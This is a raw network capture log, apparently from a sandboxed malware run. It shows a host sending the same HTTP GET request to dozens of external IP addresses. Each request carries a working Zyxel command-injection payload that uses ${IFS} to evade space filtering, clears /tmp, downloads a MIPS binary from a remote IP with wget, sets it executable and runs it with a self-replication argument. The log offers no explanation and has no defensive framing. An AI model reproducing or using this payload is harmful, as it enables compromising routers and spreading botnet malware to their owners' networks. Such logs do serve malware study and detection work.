                                      Jan 14, 2024 15:50:41.169039011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2962192.168.2.144513877.9.46.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169121981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2963192.168.2.144766490.133.74.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169182062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2964192.168.2.1457568115.10.12.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169248104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2965192.168.2.1450314208.206.39.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169284105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2966192.168.2.145217262.146.231.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169325113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2967192.168.2.1446238121.128.60.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169452906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2968192.168.2.1439200199.170.254.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169492960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2969192.168.2.144185082.128.118.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169533014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2970192.168.2.144347691.40.102.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169588089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2971192.168.2.144532237.220.228.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169636011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2972192.168.2.145654649.148.163.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169676065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2973192.168.2.1437358211.191.34.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169745922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2974192.168.2.1459226212.27.118.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169773102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2975192.168.2.144226235.171.14.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169831991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2976192.168.2.1439578168.17.162.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169883966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2977192.168.2.1446756145.222.211.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169938087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2978192.168.2.1448012112.125.205.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.169981956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2979192.168.2.1437480121.128.126.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170042992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2980192.168.2.145131687.248.108.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170087099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2981192.168.2.145681034.248.195.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170150995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2982192.168.2.1435398199.227.83.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170203924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2983192.168.2.14402864.20.68.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170248985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2984192.168.2.1433388160.169.3.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170289993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2985192.168.2.1434954190.98.127.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170350075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2986192.168.2.144887899.127.13.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170387030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2987192.168.2.1447972136.204.245.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170454025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2988192.168.2.1443606177.218.41.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170496941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2989192.168.2.144361274.156.77.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170523882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2990192.168.2.144716075.220.99.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170555115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2991192.168.2.1458994119.20.244.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170602083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2992192.168.2.1459658129.105.229.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170671940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2993192.168.2.1438944132.34.112.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170723915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2994192.168.2.1448304183.145.15.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170762062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2995192.168.2.145280672.227.88.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170814037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2996192.168.2.144197431.84.143.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170845985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2997192.168.2.1432800176.116.197.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170902967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2998192.168.2.14339004.26.186.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.170974970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2999192.168.2.1448400185.137.226.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171024084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3000192.168.2.1456544131.119.94.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171083927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3001192.168.2.1440114185.175.136.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171152115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3002192.168.2.1446994101.159.234.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171224117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3003192.168.2.1442874166.205.149.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171294928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3004192.168.2.145880669.106.207.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171339989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3005192.168.2.1440900106.112.99.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171380997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3006192.168.2.144485248.30.53.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171420097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3007192.168.2.1435588117.217.252.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171482086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3008192.168.2.1446998121.149.142.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171534061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3009192.168.2.1456938126.3.40.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171597004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3010192.168.2.143660435.22.133.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171669006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3011192.168.2.144836242.27.44.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171716928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3012192.168.2.1453884210.61.188.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171775103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3013192.168.2.1449314216.14.61.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171825886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3014192.168.2.1446802186.62.63.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171889067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3015192.168.2.144246650.237.227.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171928883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3016192.168.2.143673077.50.192.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.171982050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3017192.168.2.143831853.6.67.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172034979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3018192.168.2.1446836170.235.78.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172100067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3019192.168.2.1437452147.107.123.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172149897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3020192.168.2.145894242.130.166.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172215939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3021192.168.2.1434622163.201.155.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172287941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3022192.168.2.1460176109.25.238.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172353029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3023192.168.2.144254048.23.87.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172380924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3024192.168.2.146057893.77.165.58443
                                      TimestampBytes transferredDirectionData
